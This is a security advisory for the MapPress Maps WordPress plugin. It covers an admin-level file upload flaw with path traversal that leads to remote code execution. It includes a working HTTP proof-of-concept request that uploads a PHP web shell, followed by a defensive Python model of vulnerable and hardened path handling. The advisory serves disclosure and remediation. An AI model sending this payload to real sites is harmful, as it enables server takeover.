WPEX-ID: ABFBBA70-5158-4990-98E5-F302361DB367
Published: Mar 14, 2022

MapPress Maps for WordPress < 2.73.13 - Admin+ File Upload to Remote Code Execution

Author: qerogram
Tags: mappress, wordpress, file upload, remote code execution, vulnerability, web shell, server access

EPSS: 0.001 (percentile 42.0%)

The plugin allows a high-privileged user (Admin+) to bypass the DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS settings and upload arbitrary files to the site through the "ajax_save" function, reached via the mapp_tpl_save AJAX action. The file is written relative to the current theme's stylesheet directory and a .php extension is appended to the supplied name. No validation is performed on the content of the file, so uploading a web shell yields remote code execution. Furthermore, the name parameter is not sanitized, so a name containing path traversal sequences lets the payload be written to any directory to which the web server has write access, not just the theme directory.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8000
Content-Length: 329
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost:8000/wp-admin/admin.php?page=mappress_maps
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: [admin+]

action=mapp_tpl_save&mapdata=%7B%22center%22%3Anull%2C%22height%22%3Anull%2C%22mapid%22%3Anull%2C%22mapTypeId%22%3Anull%2C%22metaKey%22%3Anull%2C%22pois%22%3A%5B%5D%2C%22postid%22%3A0%2C%22search%22%3Anull%2C%22title%22%3Anull%2C%22width%22%3Anull%2C%22zoom%22%3Anull%7D&nonce=9fe04b45b4&name=zero.cgi&content=<?php+echo(`ls`);?>
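The following Python model is an added illustration of the two defects described above and is not the plugin's code. It reproduces, on paths only, the unpatched behaviour (name joined to the theme directory as-is, ".php" appended, no check of DISALLOW_FILE_MODS) next to a hardened variant that allow-lists the template name, refuses to write when file modifications are disabled, and verifies the resolved path stays inside the theme directory. The theme path, function names and the allow-list pattern are assumptions for the example.

```python
"""
Model of a theme-template save routine: vulnerable path handling vs. hardened.
Added illustration only; not MapPress's own code. No files are written.
"""
import posixpath
import re

# Constructed sample: the active theme's stylesheet directory
# (what get_stylesheet_directory() would return in WordPress). Assumed value.
THEME_DIR = "/var/www/html/wp-content/themes/twentytwentyone"

# Allow-list for template names (assumed policy): letters, digits, dash, underscore.
# Rejecting anything else is simpler and safer than stripping "../" sequences.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+$")


def vulnerable_target(name: str, theme_dir: str = THEME_DIR) -> str:
    """Where the unpatched behaviour writes: name is trusted, '.php' is appended.

    'zero.cgi' lands inside the theme as zero.cgi.php; a name with '../'
    segments (or a leading '/') escapes the theme directory entirely.
    """
    return posixpath.normpath(posixpath.join(theme_dir, name + ".php"))


def hardened_target(name: str, theme_dir: str = THEME_DIR,
                    file_mods_disallowed: bool = False) -> str:
    """Hardened variant: honour DISALLOW_FILE_MODS, allow-list the name, confine the path."""
    # 1. The site-wide constant the advisory says is bypassed must be respected.
    if file_mods_disallowed:
        raise PermissionError("DISALLOW_FILE_MODS is set; template writes are disabled")
    # 2. Validate the name against an allow-list rather than blacklisting characters.
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected template name: {name!r}")
    target = posixpath.normpath(posixpath.join(theme_dir, name + ".php"))
    # 3. Defence in depth: the resolved path must still be under the theme directory.
    base = posixpath.normpath(theme_dir)
    if posixpath.commonpath([base, target]) != base:
        raise ValueError(f"resolved path escapes the theme directory: {target}")
    return target


def is_rejected(name: str, **kwargs) -> bool:
    """True if the hardened routine refuses to write for this name/setting."""
    try:
        hardened_target(name, **kwargs)
    except (ValueError, PermissionError):
        return True
    return False


def demo() -> dict:
    """Compare both routines on the PoC name, a traversal name and a benign name."""
    results = {}
    for name in ["zero.cgi", "../../uploads/shell", "/tmp/x", "footer"]:
        try:
            hardened = hardened_target(name)
        except (ValueError, PermissionError) as exc:
            hardened = f"rejected ({exc})"
        results[name] = (vulnerable_target(name), hardened)
    return results


if __name__ == "__main__":
    for name, (vuln, hard) in demo().items():
        print(f"{name!r:24} vulnerable -> {vuln}")
        print(f"{'':24} hardened   -> {hard}")
```

Note that the PoC's own name, zero.cgi, is rejected by the allow-list even though it does not traverse: the dot in the name is not itself the flaw, but a name policy that only permits identifier-like values removes the whole class of `../` and absolute-path tricks without having to enumerate them.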

